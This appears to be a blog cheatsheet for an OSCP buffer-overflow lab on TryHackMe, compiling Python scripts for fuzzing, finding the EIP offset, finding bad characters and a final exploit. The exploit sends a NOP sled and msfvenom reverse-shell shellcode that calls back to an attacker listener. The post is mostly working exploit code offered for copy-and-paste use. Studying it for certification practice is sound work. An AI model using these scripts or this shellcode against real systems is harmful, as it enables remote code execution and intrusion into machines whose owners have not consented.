Hi everyone!

This post is a compilation of John Hammond's recent video on Buffer Overflow OSCP preparation from TryHackMe. You can see his video here:

Anyway, I will be using the OVERFLOW4 prefix instead. So watch his video if you haven't. The cheatsheet below will allow you to quickly copy & paste, make some changes quickly especially during your OSCP exam.

Fuzzing.py

Keep changing the offset's value until you see the EIP in the Immunity debugger turns "41414141" which shows successful overflow.

 #!/usr/bin/env python3  import socket  host, ip = "10.10.36.169", 1337  prefix = b'OVERFLOW4 ' offset = b'A' * 4000   payload = prefix + offset   with socket.socket() as s: 	s.connect((host, ip)) 	s.send(payload) 

Findoffset.py

Change the offset according to the offset value you have fuzzed. Remember to generate a new pattern via Metasploit's pattern_create.rb.

 #!/usr/bin/env python3  import socket  host, ip = "10.10.36.169", 1337  prefix = b'OVERFLOW4 ' # /usr/share/metasploit-framework/tools/exploit/pattern_create.rb --l 4000 offset = b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F'   payload = prefix + offset   with socket.socket() as s: 	s.connect((host, ip)) 	s.send(payload) 

Findbadchars.py

Remember to change the offset value once you find out the offset via the EIP's content through Metasploit's pattern_offset.rb.

Starts with an empty list of the badchar variable and slowly look at the stack to identify what is the first bad char encountered, add into the bad char list then repeat by running the program and repeat the steps until you finished analyzing from 0x00 to 0xFF.

 #!/usr/bin/env python3  import socket  host, ip = "10.10.36.169", 1337  allchar = bytearray(range(1,256)) badchar = [b'\xA9', b'\xCD', b'\xD4']  for char in badchar: 	allchar = allchar.replace(char, b'')   length = 4000 prefix = b'OVERFLOW4 ' offset = b'A' * 2026	# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 70433570 RET = b'BBBB' remaining = b'C' * (length - len(offset) - len(RET) - len(allchar))   payload = prefix + offset + RET + allchar + remaining   with socket.socket() as s: 	s.connect((host, ip)) 	s.send(payload) 

BOF.py

Remember to change the LHOST. Also, change the bad characters in the "-b" flag if you need to.

 #!/usr/bin/env python3  import socket import struct  def p32(data): 	return struct.pack("<I", data)   host, ip = "10.10.36.169", 1337   length = 4000 prefix = b"OVERFLOW4 " offset = b'A' * 2026	# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 70433570 RET = p32(0x625011bb)	# !mona jmp -r esp -cpb "\x00\xA9\xCD\xD4" NOP = b'\x90' * 32  # msfvenom -p windows/shell_reverse_tcp LHOST=10.4.39.1 LPORT=4444 EXITFUNC=thread  -f py -b "\x00\xA9\xCD\xD4" buf =  b"" buf += b"\xb8\xc1\x3f\x75\x83\xdb\xdd\xd9\x74\x24\xf4\x5a\x29" buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x42\x0e\x03\x83\x31\x97" buf += b"\x76\xff\xa6\xd5\x79\xff\x36\xba\xf0\x1a\x07\xfa\x67" buf += b"\x6f\x38\xca\xec\x3d\xb5\xa1\xa1\xd5\x4e\xc7\x6d\xda" buf += b"\xe7\x62\x48\xd5\xf8\xdf\xa8\x74\x7b\x22\xfd\x56\x42" buf += b"\xed\xf0\x97\x83\x10\xf8\xc5\x5c\x5e\xaf\xf9\xe9\x2a" buf += b"\x6c\x72\xa1\xbb\xf4\x67\x72\xbd\xd5\x36\x08\xe4\xf5" buf += b"\xb9\xdd\x9c\xbf\xa1\x02\x98\x76\x5a\xf0\x56\x89\x8a" buf += b"\xc8\x97\x26\xf3\xe4\x65\x36\x34\xc2\x95\x4d\x4c\x30" buf += b"\x2b\x56\x8b\x4a\xf7\xd3\x0f\xec\x7c\x43\xeb\x0c\x50" buf += b"\x12\x78\x02\x1d\x50\x26\x07\xa0\xb5\x5d\x33\x29\x38" buf += b"\xb1\xb5\x69\x1f\x15\x9d\x2a\x3e\x0c\x7b\x9c\x3f\x4e" buf += b"\x24\x41\x9a\x05\xc9\x96\x97\x44\x86\x5b\x9a\x76\x56" buf += b"\xf4\xad\x05\x64\x5b\x06\x81\xc4\x14\x80\x56\x2a\x0f" buf += b"\x74\xc8\xd5\xb0\x85\xc1\x11\xe4\xd5\x79\xb3\x85\xbd" buf += b"\x79\x3c\x50\x11\x29\x92\x0b\xd2\x99\x52\xfc\xba\xf3" buf += b"\x5c\x23\xda\xfc\xb6\x4c\x71\x07\x51\x79\x82\x20\x79" buf += b"\x15\x88\x2e\x68\xba\x05\xc8\xe0\x52\x40\x43\x9d\xcb" buf += b"\xc9\x1f\x3c\x13\xc4\x5a\x7e\x9f\xeb\x9b\x31\x68\x81" buf += b"\x8f\xa6\x98\xdc\xed\x61\xa6\xca\x99\xee\x35\x91\x59" buf += b"\x78\x26\x0e\x0e\x2d\x98\x47\xda\xc3\x83\xf1\xf8\x19" buf += b"\x55\x39\xb8\xc5\xa6\xc4\x41\x8b\x93\xe2\x51\x55\x1b" buf += b"\xaf\x05\x09\x4a\x79\xf3\xef\x24\xcb\xad\xb9\x9b\x85" buf += b"\x39\x3f\xd0\x15\x3f\x40\x3d\xe0\xdf\xf1\xe8\xb5\xe0" buf += b"\x3e\x7d\x32\x99\x22\x1d\xbd\x70\xe7\x3d\x5c\x50\x12" buf += b"\xd6\xf9\x31\x9f\xbb\xf9\xec\xdc\xc5\x79\x04\x9d\x31" buf += b"\x61\x6d\x98\x7e\x25\x9e\xd0\xef\xc0\xa0\x47\x0f\xc1"  remaining = b'C' * (length - len(offset) - len(RET) - len(NOP) - len(buf))   payload = prefix + offset + RET + NOP + buf + remaining   with socket.socket() as s: 	s.connect((host, ip)) 	s.send(payload) 

I hope these tabs have been helpful to you. Feel free to leave any comments below. Do remove your ad-blocker to support my blog. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction and the cost of hosting the website as well as the domain name fee. The link is here. 🙂


This post is ad-supported